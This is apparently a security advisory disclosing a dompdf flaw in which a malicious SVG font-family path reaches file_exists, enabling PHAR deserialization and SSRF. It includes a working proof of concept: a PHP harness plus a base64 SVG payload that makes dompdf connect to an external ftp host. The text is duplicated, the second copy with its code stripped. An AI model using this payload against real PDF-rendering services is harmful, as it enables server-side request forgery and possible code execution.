Summary
A lack of sanitization/check in the font path returned by php-svg-lib, in the case of a inline CSS font defined, that will be used by Cpdf to open a font will be passed to a file_exists call, which is sufficient to trigger metadata unserializing on a PHAR file, through the phar:// URL handler on PHP < 8.0. On other versions, it might be used as a way to get a SSRF through, for example, ftp, not restricted by authorized protocols configured on dompdf.
Details
The problem lies on the openFont function of the lib/Cpdf.php library, when the $font variable passed by php-svg-lib isn't checked correctly. A path is crafted through $name and $dir, which are two values that can be controlled through CSS :
$name = basename($font);
$dir = dirname($font);
[...]
$metrics_name = "$name.ufm";
[...]
if (!isset($this->fonts[$font]) && file_exists("$dir/$metrics_name")) {
Passing a font named phar:///foo/bar/baz.phar/test will set the value of $name to test and $dir to phar:///foo/bar/baz.phar, which once reconstructed will call file_exists on phar:///foo/bar/baz.phar/test.ufm. That allows to deserialize the baz.phar arbitrary file that contains a test.ufm file in the archive.
PoC
Consider the following, minimal PHP code :
<?php
require('vendor/autoload.php');
use Dompdf\Dompdf;
$dompdf = new Dompdf();
$dompdf->loadHtml($_GET['payload']);
$dompdf->setPaper('A4', 'landscape');
$options = $dompdf->getOptions();
$options->setAllowedProtocols([]);
$dompdf->render();
$dompdf->stream();
With payload being this html file :
<html>
<img src="data:image/png;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+DQo8c3ZnIHhtbG5zOnN2Zz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiIHdpZHRoPSIyMDAiIGhlaWdodD0iMjAwIj4NCiAgICA8dGV4dCB4PSIyMCIgeT0iMzUiIHN0eWxlPSJjb2xvcjpyZWQ7Zm9udC1mYW1pbHk6ZnRwOi8vYmxha2wuaXM6MjEveC95OyI+TXk8L3RleHQ+DQo8L3N2Zz4="></img>
</html>
with the base64 image being :
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<text x="20" y="35" style="color:red;font-family:ftp://blakl.is:21/x/y;">My</text>
</svg>
A connection on ftp://blakl.is:21/ will occur, bypassing the allowed protocols.
Impact
An attacker might be able to exploit the vulnerability to call arbitrary URL with arbitrary protocols, if they can force dompdf to parse a SVG with an inline CSS property using a malicious font-family. In PHP versions before 8.0.0, it leads to arbitrary unserialize, that will leads at the very least to an arbitrary file deletion, and might leads to remote code execution, depending on classes that are available.
References
Blaklis Reporter
ErwanGuillon Analyst
bsweeney Analyst
Summary
A lack of sanitization/check in the font path returned by php-svg-lib, in the case of a inline CSS font defined, that will be used by Cpdf to open a font will be passed to a
file_existscall, which is sufficient to trigger metadata unserializing on a PHAR file, through the phar:// URL handler on PHP < 8.0. On other versions, it might be used as a way to get a SSRF through, for example, ftp, not restricted by authorized protocols configured on dompdf.Details
The problem lies on the
openFontfunction of thelib/Cpdf.phplibrary, when the$fontvariable passed by php-svg-lib isn't checked correctly. A path is crafted through $name and $dir, which are two values that can be controlled through CSS :Passing a font named
phar:///foo/bar/baz.phar/testwill set the value of $name totestand $dir tophar:///foo/bar/baz.phar, which once reconstructed will call file_exists onphar:///foo/bar/baz.phar/test.ufm. That allows to deserialize thebaz.phararbitrary file that contains atest.ufmfile in the archive.PoC
Consider the following, minimal PHP code :
With payload being this html file :
with the base64 image being :
A connection on ftp://blakl.is:21/ will occur, bypassing the allowed protocols.
Impact
An attacker might be able to exploit the vulnerability to call arbitrary URL with arbitrary protocols, if they can force dompdf to parse a SVG with an inline CSS property using a malicious font-family. In PHP versions before 8.0.0, it leads to arbitrary unserialize, that will leads at the very least to an arbitrary file deletion, and might leads to remote code execution, depending on classes that are available.
References